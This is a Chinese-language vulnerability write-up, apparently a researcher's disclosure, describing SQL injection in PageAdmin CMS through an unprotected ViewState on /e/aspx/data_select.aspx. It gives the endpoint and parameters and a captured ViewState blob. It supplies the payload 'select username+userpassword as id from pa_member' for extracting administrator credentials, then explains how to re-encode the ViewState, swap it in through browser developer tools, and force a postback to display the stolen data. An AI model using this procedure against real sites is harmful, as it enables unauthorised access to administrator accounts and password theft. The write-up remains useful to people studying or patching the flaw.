pageadmin ViewState缺陷导致sql注入

漏洞作者: Damo

具体分析: 1、查找一个动态页面 例如:
/e/aspx/data_select.aspx
参数:
siteid=1&table=article&field=1&multiple=&sortid=&keyword=&pagesize=2
30145818402b53d27cfb8aa60b02c5f2cae63e20[1] 查看源码得到 :aspNetHidden 内容如下
/wEPDwUJMzkzMjk4Njc3DxYIHgtDdXJyZW50UGFnZWYeDENhbGN1bGF0ZXNxbAUzc2VsZWN0IGNvdW50KGlkKSBhcyBjbyBmcm9tIGFydGljbGUgd2hlcmUgc2l0ZV9pZD0xHgNzcWwFqQFzZWxlY3Qgc2l0ZV9pZCxzb3J0X2lkLGlkLHRpdGxlLHN0YXRpY19kaXIsc3RhdGljX2ZpbGUsbGFubXVfaWQsc3VibGFubXVfaWQsemR5X3VybCxwZXJtaXNzaW9ucyxjaGVja2VkLFtodG1sXSx0aGVkYXRlIGZyb20gYXJ0aWNsZSB3aGVyZSBzaXRlX2lkPTEgb3JkZXIgYnkgdGhlZGF0ZSBkZXNjHglQYWdlQ291bnQCkQEWAmYPZBYMAgEPFgIeC18hSXRlbUNvdW50AgIWBGYPZBYEZg8VAQM5MzlkAgEPFQEDOTM5ZAIBD2QWBGYPFQEDOTM4ZAIBDxUBAzkzOGQCAg8PFgIeBFRleHQFAzI4OWRkAgMPDxYCHwUFATFkZAIEDw8WAh8FBQMxNDVkZAIFDw8WAh4HRW5hYmxlZGhkZAIHDxBkEBWRAQExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyOQIzMAIzMQIzMgIzMwIzNAIzNQIzNgIzNwIzOAIzOQI0MAI0MQI0MgI0MwI0NAI0NQI0NgI0NwI0OAI0OQI1MAI1MQI1MgI1MwI1NAI1NQI1NgI1NwI1OAI1OQI2MAI2MQI2MgI2MwI2NAI2NQI2NgI2NwI2OAI2OQI3MAI3MQI3MgI3MwI3NAI3NQI3NgI3NwI3OAI3OQI4MAI4MQI4MgI4MwI4NAI4NQI4NgI4NwI4OAI4OQI5MAI5MQI5MgI5MwI5NAI5NQI5NgI5NwI5OAI5OQMxMDADMTAxAzEwMgMxMDMDMTA0AzEwNQMxMDYDMTA3AzEwOAMxMDkDMTEwAzExMQMxMTIDMTEzAzExNAMxMTUDMTE2AzExNwMxMTgDMTE5AzEyMAMxMjEDMTIyAzEyMwMxMjQDMTI1AzEyNgMxMjcDMTI4AzEyOQMxMzADMTMxAzEzMgMxMzMDMTM0AzEzNQMxMzYDMTM3AzEzOAMxMzkDMTQwAzE0MQMxNDIDMTQzAzE0NAMxNDUVkQEBMAExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyOQIzMAIzMQIzMgIzMwIzNAIzNQIzNgIzNwIzOAIzOQI0MAI0MQI0MgI0MwI0NAI0NQI0NgI0NwI0OAI0OQI1MAI1MQI1MgI1MwI1NAI1NQI1NgI1NwI1OAI1OQI2MAI2MQI2MgI2MwI2NAI2NQI2NgI2NwI2OAI2OQI3MAI3MQI3MgI3MwI3NAI3NQI3NgI3NwI3OAI3OQI4MAI4MQI4MgI4MwI4NAI4NQI4NgI4NwI4OAI4OQI5MAI5MQI5MgI5MwI5NAI5NQI5NgI5NwI5OAI5OQMxMDADMTAxAzEwMgMxMDMDMTA0AzEwNQMxMDYDMTA3AzEwOAMxMDkDMTEwAzExMQMxMTIDMTEzAzExNAMxMTUDMTE2AzExNwMxMTgDMTE5AzEyMAMxMjEDMTIyAzEyMwMxMjQDMTI1AzEyNgMxMjcDMTI4AzEyOQMxMzADMTMxAzEzMgMxMzMDMTM0AzEzNQMxMzYDMTM3AzEzOAMxMzkDMTQwAzE0MQMxNDIDMTQzAzE0NBQrA5EBZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZxYBZmRk
此加密内容解密的到下图: 3014593892a44c44ff99c9da2d78b8da6e36e6a0[1]     那么我们只要能修改红色圈出的部分即可 想的到什么数据 就能得到什么数据 30150035fc41c528501ea7339c966457556528f1[1]   本地测试 获取管理员中的数据 sql为红色圈住的部分 :
select username+userpassword as id from pa_member
注:可能小伙伴不解为何 as id 看页面代码
<%#DataBinder.Eval(Container.DataItem,"id")%>"
也就是说 绑定的是id 故 as id 将修改后的数据加密 加密后的内容 详细代码请查看 “测试代码” 然后 浏览器 F12 替换掉原来的加密字符串即可 ; 但是这个时候 小伙伴们捉急了 ,获取的数据哪? 那么请看 if(!Page.IsPostBack) { ViewState["sql"]="select site_id,sort_id,id,title,static_dir,static_file,lanmu_id,sublanmu_id,zdy_url,permissions,checked,[html],thedate from "+TheTable+" where site_id="+SiteId+sql_str+" order by thedate desc"; } 实际的代码片段是在这个地方 IsPostBack了 所以这个时候我们需要一个事件触发 才能获取数据 有两种方式 : 1、替换原来的加密字符串之后,点击下一页 然后在返回到第一页 即可 2、或者POST数据 到此地址 /e/aspx/data_select.aspx?siteid=1&table=article&field=1&multiple=&sortid=&keyword=&pagesize=2 这个时候小伙伴们又捉急了 数据哪 数据哪? 数据在这里 下图: 30151913c408ae368a39969ec5689a25b366ff86[1]   30151920a2f2bce477d8e7c2418a40589ef22c71[1]

发表评论